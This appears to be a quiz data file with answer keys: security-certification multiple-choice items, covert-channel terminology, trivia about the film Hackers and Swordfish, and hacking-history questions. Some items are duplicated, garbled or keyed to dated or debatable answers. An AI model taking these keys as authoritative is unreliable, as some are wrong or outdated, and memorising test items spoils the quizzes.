A#Compsec Q338. Which of the following is NOT a field of a X.509 v.3 certificate? 	^A. private key	^B. issuer 	^C. serial number 	^D. subject
C#Compsec Q339. What is the default transport layer protocol and port number that SSL (Secure Sockets Layer) uses? 	^A. UDP (User Datagram Protocol) transport layer protocol and port 80	^B. TCP (Transmission Control Protocol) transport layer protocol and port 80	^C. TCP (Transmission Control Protocol) transport layer protocol and port 443	^D. UDP (User Datagram Protocol) transport layer protocol and port 69 
B#Compsec Q340. The greater the keyspace and complexity of a password, the longer a_______ attack may take to crack the password.	^A. dictionary 	^B. brute force 	^C. inference 	^D. frontal 
A#Compsec Q341. When a cryptographic system's keys are no longer needed, the keys should be:	^A. destroyed or stored in a secure manner	^B. deleted from the system's storage mechanism	^C. recycled	^D. submitted to a key repository 
B#Compsec Q342. Creation of an information inventory is most valuable when: 	^A. localizing license based attacks	^B. trying to reconstruct damaged systems	^C. determining virus penetration within an enterprise 	^D. terminating employees for security policy violations 
C#Compsec Q343. Which of the following is the best reason for a CA (Certificate Authority) to revoke a certificate?	^A. The user's certificate has been idle for two months.	^B. The user has relocated to another address. 	^C. The user's private key has been compromised.	^D. The user's public key has been compromised. 
A#Compsec Q344. Which of the following statements identifies a characteristic of a symmetric algorithm? 	^A. performs a fast transformation of data relative to other cryptographic methods	^B. regardless of the size of the user's input data, the size of the output data is fixed. 	^C. is relatively slow in transforming data when compared to other cryptographic methods 	^D. includes a one way function where it is computationally infeasible for another entity to determine the input data from the output data 
A#Compsec Q345. Which of the following terms represents a MAC (Mandatory Access Control) model? 	^A. Lattice 	^B. Bell La-Padula 	^C. BIBA 	^D. Clark and Wilson 
B#Compsec Q346. The most common method of social engineering is:	^A. looking through users' trash for information 	^B. calling users and asking for information 	^C. e-mailing users and asking for information 	^D. e-mail 
A#Compsec Q347. In the context of the Internet, what is tunneling? Tunneling is:	^A. using the Internet as part of a private secure network 	^B. the ability to burrow through three levels of firewalls	^C. the ability to pass information over the internet within the shortest amount of time 	^D. creating a tunnel which can capture data 
B#Compsec Q348. The term cold site refers to:	^A. a low temperature facility for long term storage of critical data 	^B. a location to begin operations during disaster recovery 	^C. a facility seldom used for high performance equipment 	^D. a location that is transparent to potential attackers 
D#Compsec Q349. Sensitive material is currently displayed on a user's monitor. What is the best course of action for the user before leaving the area?	^A. The user should leave the area. The monitor is at a personal desk so there is no risk.	^B. turn off the monitor	^C. wait for the screen saver to start 	^D. refer to the company's policy on securing sensitive data 
A#Compsec Q350. The system administrator of the company has terminated employment unexpectedly. When the administrator's user ID is deleted, the system suddenly begins deleting files. This is an example of what type of malicious code? 	^A. logic bomb 	^B. virus	^C. Trojan horse 	^D. worm 
A#Compsec Q351. With regards to the use of Instant Messaging, which of the following type of attack strategies is effectively combated with user awareness training? 	^A. social engineering	^B. stealth 	^C. ambush 	^D. multi-pronged 
A#Compsec Q352. A network administrator has just replaced a hub with a switch. ^  When using software to sniff packets from the networks, the administrator notices conversations the administrator's computer is having with servers on the network, but can no longer see conversations taking place between other network clients and servers. ^  Given that the switch is functioning properly, what is the most likely cause of this? 	^A. With the exception of broadcasts, switches do not forward traffic out all ports. 	^B. The switch is setup with a VLAN (Virtual Local Area Network) utilizing all ports.	^C. The software used to sniff packets is not configured properly.	^D. The sniffer's Ethernet card is malfunctioning. 
A#Compsec Q353. Which type of password generator is based on challenge-response mechanisms? 	^A. asynchronous	^B. synchronous 	^C. cryptographic keys 	^D. smart cards 
A#Compsec Q354. Which of the following is a characteristic of MAC (Mandatory Access Control) systems? MACs (Mandatory Access Control): 	^A. uses levels of security to classify users and data	^B. allows owners of documents to determine who has access to specific documents 	^C. uses access control lists which specify a list of authorized users 	^D. uses access control lists which specify a list of unauthorized users 
C#Compsec Q355. Companies without an acceptable use policy (AUP) may give their employees an expectation of: 	^A. intrusions 	^B. audits 	^C. privacy 	^D. prosecution 
A#Compsec Q356. It is most difficult to eavesdrop on which of the following types of network cabling? 	^A. fiber optic cable	^B. coaxial cable 	^C. UTP (Unshielded Twisted Pair) 	^D. STP (Shielded Twisted Pair) 
C#Compsec Q357. Implementation of access control devices and technologies must fully reflect an organization's security position as contained in its: 	^A. ACLs (Access Control List) 	^B. access control matrixes	^C. information security policies	^D. internal control procedures 
D#Compsec Q358. Which of the following are tunneling protocols?	^A. IPSec (Internet Protocol Security), L2TP (Layer Two Tunneling Protocol), and SSL (Secure Sockets Layer) 	^B. IPSec (Internet Protocol Security), L2TP (Layer Two Tunneling Protocol), and PPP (Point-to-Point Protocol) 	^C. L2TP (Layer Two Tunneling Protocol), PPTP (Point-to-Point Tunneling Protocol), and SSL (Secure Sockets Layer)	^D. PPTP (Point-to-Point Tunneling Protocol), L2TP (Layer Two Tunneling Protocol), and IPSec (Internet Protocol Security) 
B#Compsec Q359. What are TCP (Transmission Control Protocol) wrappers used for? 	^A. preventing IP (Internet Protocol) spoofing 	^B. controlling access to selected services	^C. encrypting TCP (Transmission Control Protocol) traffic 	^D. sniffing TCP (Transmission Control Protocol) traffic to troubleshoot 
C#Compsec Q360. Loki, NetCat, Masters Paradise and NetBus are all considered what type of attack? 	^A. brute force 	^B. spoofing 	^C. back door 	^D. man in the middle 
A#Compsec Q361. Which protocol is used to negotiate and provide authenticated keying material for security associations in a protected manner? 	^A. ISAKMP (Internet Security Association and Key Management Protocol)	^B. ESP (Encapsulating Security Payload) 	^C. SSH (Secure Shell) 	^D. SKEME (Secure Key Exchange Mechanism)
D#Compsec Q362. An administrator wants to set up a system for an internal network that will examine all packets for known attack signatures. What type of system will be set up? 	^A. vulnerability scanner 	^B. packet filter 	^C. host based IDS (Intrusion Detection System)	^D. network based IDS (Intrusion Detection System) 
A#Compsec Q363. A password management system designed to provide availability for a large number of users includes which of the following? 	^A. self service password resets 	^B. locally saved passwords 	^C. multiple access methods 	^D. synchronized passwords 
A#Compsec Q364. Turnstiles, double entry doors and security guards are all prevention measures for what type of social engineering? 	^A. piggybacking 	^B. looking over a co-worker's shoulder to retrieve information 	^C. looking through a co-worker's trash to retrieve information 	^D. impersonation 
B#Compsec Q365. What is the major reason that social engineering attacks succeed? 	^A. strong passwords are not required 	^B. lack of security awareness 	^C. multiple logins are allowed 	^D. audit logs are not monitored frequently 
D#Compsec Q366. Which authentication protocol should be employed to encrypt passwords? 	^A. PPTP (Point-to-Point Tunneling Protocol) 	^B. SMTP (Simple Mail Transfer Protocol) 	^C. Kerberos 	^D. CHAP (Challenge Handshake Authentication Protocol) 
C#Compsec Q367. NAT (Network Address Translation) can be accomplished with which of the following? 	^A. static and dynamic NAT (Network Address Translation) and PAT (Port Address Translation)	^B. static and hide NAT (Network Address Translation)	^C. static and hide NAT (Network Address Translation) and PAT (Port Address Translation)^D. static, hide, and dynamic NAT (Network Address Translation) 
B#Compsec Q368. In order for an SSL (Secure Sockets Layer) connection to be established between a web client and server automatically, the web client and server should have a(n): ^A. shared password ^B. certificate signed by a trusted root CA (Certificate Authority)^C. address on the same subnet ^D. common operating system 
D#Compsec Q369. A mobile sales force requires remote connectivity in order to access shared files and e-mail on the corporate network. ^  All employees in the sales department have laptops equipped with Ethernet adapters. Some also have modems. What is the best remote access solution to allow all sales employees to access the corporate network? 	^A. ISDN (Integrated Services Digital Network) 	^B. dial-up 	^C. SSL (Secure Sockets Layer) 	^D. VPN (Virtual Private Network) 
A#Compsec Q370. Which of the following four critical functions of a VPN (Virtual Private Network) restricts users from using resources in a corporate network?	^A. access control 	^B. authentication 	^C. confidentiality 	^D. data integrity 
A#Compsec Q371. Of the following, what is the primary attribute associated with e-mail hoaxes? 	^A. E-mail hoaxes create unnecessary e-mail traffic and panic in non-technical users.	^B. E-mail hoaxes take up large amounts of server disk space. 	^C. E-mail hoaxes can cause buffer overflows on the e-mail server. 	^D. E-mail hoaxes can encourage malicious users. 
D#Compsec Q372. Most certificates used for authentication are based on what standard? 	^A. ISO 19278	^B. X.500 	^C. RFC 1205 	^D. X.509 v3 
A#Compsec Q373. In order for User A to send User B an e-mail message that only User B can read, User A must encrypt the e-mail with which of the following keys? 	^A. User B's public key 	^B. User B's private key 	^C. User A's public key 	^D. User A's private key 
C#Compsec Q374. What does the message recipient use with the hash value to verify a digital signature? 	^A. signer's private key 	^B. receiver's private key 	^C. signer's public key 	^D. receiver's public key 
A#Compsec Q375. While surfing the Internet a user encounters a pop-up window that prompts the user to download a browser plug-in. ^  The pop-up window is a certificate which validates the identity of the plug-in developer. Which of the following best describes this type of certificate? 	^A. software publisher certificate 	^B. web certificate 	^C. CA (Certificate Authority) certificate 	^D. server certificate 
C#Compsec Q376. The public key infrastructure model where certificates are issued and revoked via a CA (Certificate Authority) is what type of model? 	^A. managed 	^B. distributed 	^C. centralized	^D. standard 
B#Compsec Q377. Company intranets, newsletters, posters, login banners and e-mails would be good tools to utilize in a security: 	^A. investigation 	^B. awareness program 	^C. policy review 	^D. control test 
B#Compsec Q378. What is a network administrator protecting against by ingress/egress filtering traffic as follows:^  Any packet coming into the network must not have a source address of the internal network. ^  Any packet coming into the network must have a destination address from the internal network. ^  Any packet leaving the network must have a source address from the internal network. ^  Any packet leaving the network must not have a destination address from the internal network. ^  Any packet coming into the network or leaving the network must not have a source or destination address of a private address or an address listed in RFC 1918 reserved space.	^A. SYN (Synchronize) flooding 	^B. spoofing 	^C. DoS (Denial of Service) attacks 	^D. dictionary attacks 
A#Compsec Q379. When hosting a web server with CGI (Common Gateway Interface) scripts, the directories for public view should have:	^A. execute permissions 	^B. read and write permissions 	^C. read, write, and execute permissions 	^D. full control permissions 
A#Compsec Q380. When User A applies to the CA (Certificate Authority) requesting a certificate to allow the start of communication with User B, User A must supply the CA (Certificate Authority) with	^A. User A's public key only 	^B. User B's public key only 	^C. User A's and User B's public keys 	^D. User A's and User B's public and private keys 
B#Compsec Q381. Which of the following most accurately describes a DMZ (Demilitarized Zone)?	^A. an application program with a state that authenticates the user and allows the user to be categorized based on privilege 	^B. a network between a protected network and an external network in order to provide an additional layer of security 	^C. the entire area between the network of origin and the destination network	^D. an application that allows the user to remove any offensive of an attacker 
A#Compsec Q382. A protocol specified in IEEE (Institute of Electrical and Electronics Engineers) 802.11b intended to provide a WLAN (Wireless Local Area Network) with the level of security associated with a WAN (Wireless Local-Area Network) is: 	^A. WEP (Wired Equivalent Privacy) 	^B. ISSE (Information Systems Security Engineering) 	^C. ISDN (Integrated Services Digital Network) 	^D. VPN (Virtual Private Network) 
A#Compsec Q383. SSL (Secure Sockets Layer) operates between which two layers of the OSI (Open Systems Interconnection) model? 	^A. application and transport 	^B. transport and network 	^C. network and data link 	^D. data link and physical 
B#Compsec Q385. What are the three entities of the SQL (Structured Query Language) security model? 	^A. actions, objects and tables 	^B. actions, objects and users 	^C. tables, objects and users 	^D. users, actions and tables 
A#Compsec Q386. Which is of greatest importance when considering physical security? 	^A. reduce overall opportunity for an intrusion to occur 	^B. make alarm identification easy for security professionals 	^C. barricade all entry points against unauthorized entry 	^D. assess the impact of crime zoning and environmental considerations in the overall design 
A#Compsec Q387. The flow of packets traveling through routers can be controlled by implementing what type of security mechanism? 	^A. ACLs (Access Control List) 	^B. fault tolerance tables 	^C. OSPF (Open Shortest Path First) policy 	^D. packet locks 
A#Compsec Q388. Clients in Company A can view web sites that have been created for them, but CAN NOT navigate in them. Why might the clients not be able to navigate in the sites? 	^A. The sites have improper permissions assigned to them. 	^B. The server is in a DMZ (Demilitarized Zone). 	^C. The sites have IP (Internet Protocol) filtering enabled. 	^D. The server has heavy traffic. 
A#Compsec Q389. The goal of TCP (Transmission Control Protocol) hijacking is: 	^A. taking over a legitimate TCP (Transmission Control Protocol) connection 	^B. predicting the TCP (Transmission Control Protocol) sequence number 	^C. identifying the TCP (Transmission Control Protocol) port for future exploitation 	^D. identifying source addresses for malicious use 
D#Compsec Q390. TCP/IP (Transmission Control Protocol/Internet Protocol) hijacking resulted from exploitation of the fact that TCP/IP (Transmission Control Protocol/Internet Protocol): 	^A. has no authentication mechanism, thus allowing a cleartext password of 16 bytes 	^B. allows packets to be tunneled to an alternate network 	^C. has no authentication mechanism, and therefore allows connectionless packets from anyone	^D. allows a packet to be spoofed and inserted into a stream, thereby enabling commands to be executed on the remote host 
D#Compsec Q391. Intruders are detected accessing an internal network. The source IP (Internet Protocol) addresses originate from trusted networks. The most common type of attack in this scenario is:	^A. social engineering	^B. TCP/IP hijacking 	^C. smurfing 	^D. spoofing 
C#Compsec Q392. Which of the following is used to authenticate and encrypt IP (Internet Protocol) traffic? 	^A. ESP (Encapsulating Security Payload) 	^B. S/MIME (Secure Multipurpose Internet Mail Extensions) 	^C. IPSec (Internet Protocol Security) 	^D. IPv2 (Internet Protocol version 2) 
B#Compsec Q393. An administrator is configuring a server to make it less susceptible to an attacker obtaining the user account passwords. ^  The administrator decides to have the encrypted passwords contained within a file that is readable only by root. What is a common name for this file? 	^A. passwd 	^B. shadow 	^C. hosts.allow 	^D. hosts.deny 
A#Compsec Q394. Which of the following is the best IDS (Intrusion Detection System) to monitor the entire network? 	^A. a network based IDS (Intrusion Detection System) 	^B. a host based IDS (Intrusion Detection System) 	^C. a user based IDS (Intrusion Detection System) 	^D. a client based IDS (Intrusion Detection System) 
A#Compsec Q395. One of the primary concerns of a centralized key management system is that?	^A. keys must be stored and distributed securely 	^B. certificates must be made readily available 	^C. the key repository must be publicly accessible 	^D. the certificate contents must be kept confidential 
B#Compsec Q396. What standard security protocol provides security and privacy in a WLAN (Wireless Local Area Network)? 	^A. SWP (Secure WLAN Protocol) 	^B. WEP (Wired Equivalent Privacy) 	^C. SSL (Secure Sockets Layer) 	^D. S/MIME (Secure Multipurpose Internet Mail Extensions) 
A#Compsec Q397. What port scanning technique is used to see what ports are in a listening state and then performs a two way handshake? 	^A. TCP (transmission Control Protocol) SYN (Synchronize) scan 	^B. TCP (transmission Control Protocol) connect scan 	^C. TCP (transmission Control Protocol) fin scan 	^D. TCP (transmission Control Protocol) null scan 
B#Compsec Q398. Performing a security vulnerability assessment on systems that a company relies on demonstrates: 	^A. that the site CAN NOT be hacked 	^B. a commitment to protecting data and customers	^C. insecurity on the part of the organization 	^D. a needless fear of attack 
B#Compsec Q399. The best reason to perform a business impact analysis as part of the business continuity planning process is to: 	^A. test the veracity of data obtained from risk analysis 	^B. obtain formal agreement on maximum tolerable downtime 	^C. create the framework for designing tests to determine efficiency of business continuity plans	^D. satisfy documentation requirements of insurance companies covering risks of systems and data important for business continuity
D#Compsec Q400. A FTP (File Transfer Protocol) bounce attack is generally used to:	^A. exploit a buffer overflow vulnerability on the FTP (File Transfer Protocol) server 	^B. reboot the FTP (File Transfer Protocol) server 	^C. store and distribute malicious code	^D. establish a connection between the FTP (File Transfer Protocol) server and another computer
A#Compsec Q401. E-mail servers have a configuration choice which allows the relaying of messages from one e-mail server to another. An e-mail server should be configured to prevent e-mail relay because:	^A. untraceable, unwanted e-mail can be sent	^B. an attacker can gain access and take over the server 	^C. confidential information in the servers e-mail boxes can be read using the relay 	^D. the open relay can be used to gain control of nodes on additional networks 
B#Compsec Q402. A security designer is planning the implementation of security mechanisms in a RBAC (Role Based Access Control) compliant system. The designer has determined that there are three types of resources in the system including files, printers, and mailboxes. The organization has four distinct departments with distinct functions including Sales, Marketing, Management, and Production. Each department needs access to different resources. Each user has a workstation. Which roles should be created to support the RBAC (Role Based Access Control) model?	^A. file, printer, and mailbox roles	^B. sales, marketing, management, and production roles 	^C. user and workstation roles	^D. allow access and deny access roles 
A#Compsec Q404. One characteristic of biometrics is: 	^A. it does not require a password	^B. it is 100% effective	^C. false positives are rare 	^D. false negatives are rare
C#Compsec Q405. As a security administrator, what are the three categories of active responses relating to intrusion detection? 	^A. collect additional information, maintain the environment, and take action against the intruder 	^B. collect additional information, maintain the environment, and take action against the intruder 	^C. collect additional information, change the environment, and take action against the intruder 	^D. discard any additional information, change the environment, and take action against the intruder 
A#Compsec Q406. Intrusion detection systems typically consist of two parts, a console and a:	^A. sensor	^B. router	^C. processor	^D. firewall 
B#Compsec Q407. The owner of a file modifies the security settings of that file on the servers to limit access to specific individuals. Which method of security is being applied?	^A. MAC (Mandatory Access Control)	^B. DAC (Discretionary Access Control)	^C. SAC (Subject Access Control)	^D. RBAC (Role Based Access Control)
C#Compsec Q408. A block cipher is an example of which of the following encryption algorithms?	^A. asymmetric key	^B. public key	^C. symmetric key	^D. unkeyed
C#Compsec Q409. There are a number of ports in TCP/IP that can be scanned, exploited or attacked. How many ports are vulnerable to such operations?	^A. 32	^B. 1,024	^C. 65,535	^D. 16,777,216
B#Compsec Q410. Which of the following makes a token based authentication system very difficult to attack?	^A. a token uses a digital certificate	^B. a token is something that is physically possessed	^C. a token can only be used once	^D. a token can only be used by the intended owner.
C#Compsec Q411. The main purpose of digital certificates is to securely bind a:	^A. public key to the identity of the signer and recipient	^B. private key to the identity of the signer and recipient	^C. public key to the entity that holds the corresponding private key	^D. private key to the entity that holds the corresponding public key 
B#Compsec Q412. Which of the following is an asymmetric cryptographic algorithm?	^A. AES	^B. ElGamal	^C. IDEA	^D. DES
Covert Channels# CC Q1: To hide the data and the fact that you're communicating is the use of?
Encryption#CC Q2: What can be used to scramble data in a covert channel?
Legitimate#CC Q3: Actual data transfer in a covert channel should appear as _____ to the casual eye.
innocuous#CC Q4: Actual data transfer in a covert channel should appear as _____ to the casual eye.
A#CC Q5: Any communication channel can be exploited by a process to transfer information in a manner that violates the systems security policy. ^A: True ^B: False
a,b,c,d# CC Q6: A covert channel can be used to: ^A: Download tools from the outside	^B: Upload internal data to the outside	^C: Create virtual network to the outside machine ^D: communicate to the outside party ^E: it has no obvious use
file-based steganography#CC Q7: a type of covert channel ___-____ ________
network packet steganography#CC Q8: a network type of covert channel ______ _______ _________
Protocol encapsulation# CC Q9: a type of covert channel _______ __________
tcp over ssl#CC Q10: a typical use of a covert channel ___ over ___
tcp over ssh#CC Q11: a typical use of a covert channel ___ over ___
application-layer tunneling#CC Q12: a type of covert channel _________-_____ ________
tcp over https#CC Q13: a typical example of application-layer tunneling is:
tcp over DNS#CC Q14: a typical example of application-layer tunneling is:
tcp over ICMP#CC Q15: a typical example of application-layer tunneling is:
File-Base Steganograpy#CC Q16: for hiding messages in an image and other files u can use: 
packet header#CC Q17: In network packet steganography, covert data may be in the: 
Initial Sequence Number#CC Q18: ISN, often misused in covert channels stands for: 
random#CC Q19: ISN's should be:
ICMP ECHO REQUEST and ICMP ECHO REPLY#CC Q20: ICMP tunneling, what are the best candidates to look for?
SSL Wrappers#CC Q21: a protocol built to encapsulate or piggyback other data:
HTTPS#CC Q22: a protocol built to encapsulate or piggyback other data:
SMTPS#CC Q23: a protocol built to encapsulate or piggyback other data:
POP3S#CC Q24: a protocol built to encapsulate or piggyback other data:
Connect#CC Q25: HTTPS uses SSL for encryption; to prevent HTTP tunneling u can block the ______ method.
HTTP POST#CC Q26: Data can be sent as: ______ data. Clients will connect periodically with NOP (not operational)
NSTX#CC Q27: With ___ u can create IP over DNS
Crash Override and Zero Cool#Hackers The Movie Q1: What are Dade Murphy's two hacker aliases? 
D#HTM Q2:  What question did Dade's mother ask him near the beginning of the movie, whilst he was in the shower?	^A: Hack any good sites last night?	^B: Were you on the computer all night?	^C: Did you forget to wash behind your ears?	^D:You hooked it up to the phone again didn't you?
1507#HTM Q3: How many computer systems was Dade responsible for crashing when he was 12 years old? 
Razor and Blade#HTM Q4: What are the names of the two elite hackers that Dade and Kate go to for help? 
Marc Anthony#HTM Q5: What Latino singer plays an FBI agent in the movie? 
triple#HTM Q6: How many times faster than the Pentium, does Kate say her new computer's speed is? 
B#HTM Q7: What song is playing as Dade, The Phreak and Cereal Killer enter Kate's party?	^A:Voodoo People, The Prodigy	^B:Connected, The Stereo MC's	^C:Hey Boy, Hey Girl, The Chemical Brothers	^D:Teardrop, Massive Attack
B#HTM Q8: Who did Eugene Belford disguise himself as, when hacking into the FBI website to change Dade's mother's criminal record?^A:NYPD Officer	^B:Alabama State Trooper	^C:FBI Agent	^D:CIA Agent
B#HTM Q9: What soft drink do Razor and Blade claim is the soft drink of the elite hacker?	^A:Coca Cola	^B:Jolt Cola	^C:Pepsi Cola	^D:7 Up
D#HTM Q10: What is the name of the virus that the hackers were being blamed for infecting the Gibson with?	^A: Melissa	^B: Rabbit	^C: Cookie Monster	^D: Da Vinci
homocidal#HTM Q11: Finish this quote: "What's your interest in Kate Libby? Academic? Purely sexual? ________. (One Word. Dade's response to the question.)" 
A#HTM Q12: Who said: Well, it looks like I'm on top?	^A: Crash Override	^B: Phantom Phreak	^C: Acid Burn	^D: Cereal Killer
A#HTM Q13: Who does Phantom Phreak call: Boy Meets World?	^A: Joey	^B: Cereal Killer	^C: Dade	^D: Himself
A#HTM Q14: What does Dade say to Kate when the sprinklers go off in the school?	^A: Pool on the roof must have a leak.	^B: Mess with the best, die like the rest.	^C: Looks like it rained on your parade.	^D: Looks like you're all wet.
C#HTM Q15: Who says, "Spandex: it's a privilege, not a right"?	^A: The Plague	^B: Crash Override	^C: Cereal Killer	^D: Phantom Phreak
B#HTM Q16: Who says, "Never fear, I is here"? ^A: Crash Override	^B: The Plague	^C: Cereal Killer	^D: Joey
D#HTM Q17: "His parents missed Woodstock and he's been making up for it ever since." Who said this?	^A: Cereal Killer	^B: Crash Override	^C: Acid Burn	^D: Phantom Phreak
Mess with the best, die like the rest#HTM Q18: What is Crash Override's catchphrase? 
froot loops#HTM Q19: Finish this quote: "Meet Cereal Killer. As in ____." 
Lord Nikon#HTM Q20: Who is referred to as "Polaroid Head"? 
Jonny Lee Miller#HTM Q21: Which actor portrays Dade Murphy (Crash Override)? 
Angelina Jolie#HTM Q22: Which actress portrays Kate Libby (Acid Burn)? 
B#HTM Q23: Dade was arrested when he was eleven years old. Where and when did it happen?	^A: Los Angeles, 1988	^B: Seattle, 1988	^C: Boston, 1985	^D: Los Angeles, 1985
A#HTM Q24: How many separate systems did Dade (as Zero Cool) cause to crash in one day leading to his arrest?	^A: 1507	^B: 1205	^C: 502	^D: 1000
B#HTM Q25: When Dade is allowed to use a computer again on his 18th birthday, he takes over a television station. What show does he play?	^A: The X-Files	^B: The Outer Limits	^C: The Twilight Zone	^D: Alfred Hitchcock Presents
C#HTM Q26: According to the movie, what are the four most commonly used passwords?	^A: money, love sex, secret	^B: secret, peace, love, god	^C: love, secret, sex, god	^D: love, peace, secret, sex
A#HTM Q27: The file Joey copied was a 'garbage-named' file?	^A: True	^B: False
A#HTM Q28: How is Dade persuaded to return his copy of the disk?	^A: his mother's safety is threatened	^B: he never returned a copy of the disk	^C: he is bribed with cash	^D: he is offered a car
D#HTM Q29: The Hackers follow a show featuring 'Razor and Blade'. What is it called?	^A: Hackers Of The World	^B: Hacking With Razor and Blade	^C: Compute This	^D: Hack The Planet
rollerblades#HTM Q30: What do the hackers use to go from one place to the next? 
B#HTM Q31: As the movie ends, Dade and Kate are on their first date. Where do we last see them?	^A: video arcade	^B: rooftop swimmingpool	^C: rollercoaster	^D: dancing in a club
D#HTM Q32: What is the real-life connection between co-stars Angelina Jolie and Jonny Lee Miller?	^A: They went to the same grade school	^B: Both were trained in ballet	^C: they both had a dog named Buddy as a child	^D: After filming Hackers, they got married
8BBS#History Q1: What was one of the first underground message boards?
A#History Q2: Why did the police seize the entire board of 8BBS, the stronghold of the West Coast phone-phreak elite, in 1982?	^A: A friendly 8BBS alumnus passed the sysop a new modem which had been purchased by credit-card fraud.	^B: Microsoft put out a reward so a rival group betrayed them.	^C: They compromised a highly secure government system.	^D: The system was used by Lex Luthor for breaking computer security
Legion of Doom#History Q3: Name a group sprung up in 1984
Lex Luthor#History Q4: Who was at the helm of Legion of Doom?
Phone Phreak#History Q5: Someone who "hacks" the telephone system is called a?
Kevin Poulsen#History Q6: AKA Dark Dante, What is his real name?
Porsche#History Q7: In one of his more creative exploits, A phone quiz,  Kevin Poulsen won a:
Berkeley Blue and Oak Toebark#History Q8: Name two members of California's Homebrew Computer Club
Steve Jobs#History Q9: What's the real name of California's Homebrew Computer Club member: Berkeley Blue?
Steve Wozniak#History Q10: What's the real name of California's Homebrew Computer Club member Oak Toebark, who later went on to found Apple Computer?
Michelangelo#History Q11: In 1992 up to one quarter of American hard drives would be completely erased, accordingly to the media. What virus was held responsible?
C#History Q12: What did Robert Morris write in 1988?	^A: A Virus	^B: A Trojan	^C: A Worm	^D: A Hoax
D#History Q13: What started a nationwide crackdown on hackers on January 18, 1990?	^A: phone phreaks found ways to manipulate an AT&T phone system causing blocking of long-distance calls 	^B: An Internet worm replicated so many times and sucked up so many CPU cycles, bringing the Internet to its knees.	^C: A virus infected the national power grid and caused a blackout.	^D: The information security of AT&T's nationwide network was shut down for almost nine hours due to an internal bug.
A whistle#History Q14: What did John Draper, (Phone Phreak) use to make  free long-distance calls?
Captain Crunch#History Q15: What is the handle of John Draper, a Phone Phreaker?
B#History Q16: Where did Captain Crunch find his whistle to *Phreak the Phone*?	^A: In a toystore	^B: In a box of children's cereal	^C: In a musicstore for classical musicians	^D: I really don't have a clue....
War Games#History Q17: Some of the most notorious hackers cite this movie as their original inspiration:
25#History Q18: At the age of ??, Kevin Mitnick compromised the internet security and email security of MCI and Digital Equipment 
a moth#History Q19: What did Rear Admiral Grace Murray Hopper find trapped between relays in a Navy computer, now known as a bug?
John von Neumann#History Q20: Who devised the theory of self-replicating programs providing the theoretical foundation for computers that hold information in their "memory."? 
1960#History Q21: When did AT&T introduce its Dataphone, the first commercial modem?
American Standard Code for Information Interchange#History Q22: What does ASCII stand for? 
1969#History Q23: In what year was ARPANET launched, an early network used by government research groups and universities?
A Virus#History Q24: What's a computer program called that can "affect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself"?
Cyberspace#History Q25: In his novel, "Neuromancer," author William Gibson popularizes the term "___________," a word he used to describe the network of computers through which the characters in his futuristic novels travel. 
Pakistan#History Q26 1986: One of the first PC viruses ever created, "The Brain," is released by programmers in ____________ 
1979#History Q27: What year? Engineers at Xerox Palo Alto Research Center discover the computer "worm," a short program that scours a network for idle processors
PGP#History Q28: 1991:The U.S. government begins a three-year criminal investigation on Philip Zimmerman. What caused it?
Good Times#History Q29: Which phrase demonstrated the self-replicating power of e-mail virus hoaxes that continue to circulate in different forms today
A#History Q30: 1995 Microsoft Corp. releases Windows 95. Anti-virus companies worry that the operating system will be:	^A: resistant to viruses	^B: vulnerable to viruses	^C: already infected with a virus	^D: not able to remove a virus
Solar Sunrise#History Q31 1998: Intruders infiltrate and take control of more than 500 military, government and private sector computer systems. What's the event called?
B#History Q32 1998: Intruders infiltrate and take control of more than 500 military, government and private sector computer systems. Who was behind this?	^A: Hackers from Iraq	^B: Two Californian teenagers	^C: A student from the Philippines	^D: Melissa virus author David L. Smith
Melissa#History Q33: This virus sends copies of itself to the first 50 names listed in the recipient's Outlook e-mail address book and also infects Microsoft Word documents, sending them to the same 50 recipients
C#History Q34: Who wrote The "I Love You" virus?	^A: Dutch scriptkiddie	^B: German highschool student	^C: Filipino computer student	^D: Iraqi terrorist
A#History Q35: The creator of the I love You virus goes free because:	^A: His country had no laws against hacking and spreading computer viruses	^B: There was not enough evidence.	^C: He confessed and was offered a job as a sysadmin	^D: He promised Bill Gates never to write a virus again
A DDOS attack#History Q36 2000: Yahoo, eBay, Amazon, Datek and dozens of other high-profile Web sites are knocked offline for up to several hours. What caused it?
The White House Website#History Q37: What was the main target of The Code Red worm?
5#History Q38: 2001 Just days after the Sept. 11: How many methods of infecting systems and replicating itself, comes with the Nimda virus?
20#History Q39: Melissa virus author David L. Smith, 33, is sentenced to _??_  months in federal prison
Klez#History Q40 2002: This worm also attempts to disable some common anti-virus products and has a payload that fills files with all zeroes
13#History Q41 2002: A denial-of-service attack hits all _??_ of the "root" servers that provide the primary roadmap for almost all Internet communications
D#History Q42: The "Slammer" worm infects hundreds of thousands of computers in less than three hours. It also knocks off:	^A: An aircraft carrier	^B: Powerplants	^C: Mobile Phones	^D: cash machines 
Social engineering#History Q43: MyDoom uses "________ _________," or low-tech psychological tricks, to persuade people to open the e-mail attachment that contains the virus.
A#History Q44: MyDoom claimed to be:	^A: a notification that an e-mail message sent earlier has failed	^B: u really need to open this mail because u won the lottery	^C: It was the confirmation about your order	^D: a Microsoft patch to be installed with no delay!
Swordfish#Movie Q1: In this movie, John Travolta hacked the Department of Defense
a dell#Movie Swordfish Q2: What brand did Hugh Jackman use to crack the Department of Defense.
B#Movie Swordfish Q3: From where did Hugh crack the DOD?	^A: His house	^B: A nightclub	^C: A cybercafe	^D: A Phonecell
PDP-10#Movie Swordfish Q4: What kind of system was located in the basement of Cal-Tech?
Flash#Movie Swordfish Q5: What kind of interface had the PDP in the basement of Cal-tech?
Carnivore#Movie Swordfish Q6: Jackman was on parole for hacking; he put a worm into ________?
B#Movie Swordfish Q7: Warner Bros approached 2600: The Hacker Quarterly magazine to use their magazine and name in the movie. They said:	^A: YES	^B: NO	^C: Yes but...	^D: No, unless...
C#Movie Swordfish Q8: Warner Bros was suing 2600 for: 	^A: Hacking	^B: a DDOS Attack	^C: linking to the DVD deciphering program DECSS ^D: Credit card fraud
Emmanuel Goldstein#Movie Hackers Q100: The name of one character in the hacking group, a nod to the pseudonym of Eric Corley, publisher of the real-life magazine The Hacker Quarterly
1984#Movie Hackers Q101: Corley took his handle "Emmanuel Goldstein" from a character in George Orwell's novel ???? 
Hacker Manifesto#Movie Hackers Q102: What was agent Bob reading?
The Mentor#History Q45: "Hacker Manifesto" was published in PHRACK magazine, issue 07, file 03 in 1986, Who wrote it? 
yes i agree#History Q46: "My crime is that of curiosity... I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all." Say: yes i agree
Neuromancer#History Q47: William Gibson "invented" the term "Cyberspace" in 1982 for his book __________
